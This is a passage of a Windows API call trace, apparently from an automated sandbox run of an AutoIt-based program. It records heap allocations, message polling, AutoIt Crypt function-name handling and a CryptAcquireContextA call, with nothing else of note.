lpMem=0x2f04230 | out: hHeap=0x970000) returned 1 [0241.926] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0241.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0241.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54cb8 [0241.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0241.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0241.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0241.926] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0241.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f08 [0241.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7faa8 [0241.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0241.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0241.926] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0241.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f490 [0241.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0241.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0241.927] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0241.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0241.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0241.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0241.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0241.927] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0241.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0241.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0241.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f490 | out: hHeap=0x970000) returned 1 [0241.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0241.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7faa8 | out: hHeap=0x970000) returned 1 [0241.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0241.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0241.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0241.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0241.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0241.927] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0241.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0241.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0241.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0241.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0241.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0241.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7faa8 [0241.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0241.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0241.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0241.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0241.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0241.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0241.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0241.928] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0241.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0241.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0241.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0241.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f4b8 [0241.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0241.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0241.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0241.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f760 [0241.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0241.928] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0241.929] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0241.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0241.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0241.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0241.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0241.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0241.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0241.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0241.929] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0241.929] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0241.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04540 | out: hHeap=0x970000) returned 1 [0241.929] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0241.929] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0241.930] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0241.930] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2e69a28, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0241.930] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0241.930] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2e69bc8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0241.930] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa5f958) returned 1 [0241.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0241.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0241.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0241.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0241.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0241.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0241.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0241.972] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0241.972] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0241.972] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0241.972] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0241.973] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0241.973] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0241.973] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0241.973] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04118 [0241.973] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0241.973] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0241.973] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0241.973] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0241.973] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0241.973] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0241.974] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0241.974] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0241.974] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04540 [0241.974] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0241.974] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0241.974] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0241.974] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0241.974] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0241.974] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0241.974] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0241.974] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0241.974] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0241.974] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0241.974] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0241.974] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0241.974] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69888 [0241.975] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0241.975] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0241.975] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f046c8 [0241.975] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0241.975] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0241.975] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0241.975] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0241.975] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0241.975] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0241.975] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0241.975] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0241.975] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f440 [0241.975] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0241.975] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0241.975] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0241.975] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0241.975] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0241.975] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0241.976] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0241.976] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0241.976] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0241.976] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0241.976] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0241.976] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0241.976] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0241.976] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f3a0 [0241.976] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0241.976] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0241.976] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0241.976] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0241.976] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0241.976] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0241.976] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0241.976] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0241.976] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0241.976] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0241.976] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f3f0 [0241.976] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0241.976] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0241.977] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0241.977] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0241.977] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0241.977] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0241.977] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0241.977] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0241.977] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0241.977] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0241.977] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f698 [0241.977] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0241.977] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0241.977] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0241.977] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0241.977] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0241.977] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f4e0 [0241.977] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0241.977] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0241.977] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f4e0 | out: hHeap=0x970000) returned 1 [0241.977] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0241.977] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51118 [0241.977] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0241.978] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0241.978] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0241.978] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04230 [0241.978] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0241.978] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0241.978] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04230 | out: hHeap=0x970000) returned 1 [0241.978] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0241.978] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51220 [0241.978] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0241.978] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0241.978] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0241.978] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0241.978] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0241.978] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0241.978] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0241.978] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0241.978] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0241.978] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69bc8 [0241.978] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0241.978] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0241.978] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0241.978] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0241.978] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0241.978] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0241.978] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0241.978] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04700 [0241.978] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0241.979] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0241.979] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04700 | out: hHeap=0x970000) returned 1 [0241.979] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0241.979] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51298 [0241.979] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0241.979] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0241.979] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0241.979] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0241.979] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0241.979] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0241.979] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0241.979] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0241.979] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0241.979] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0241.979] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0241.979] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0241.979] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0241.979] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0241.979] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0241.979] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0241.979] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0241.979] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0241.979] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0241.980] RtlAllocateHeap 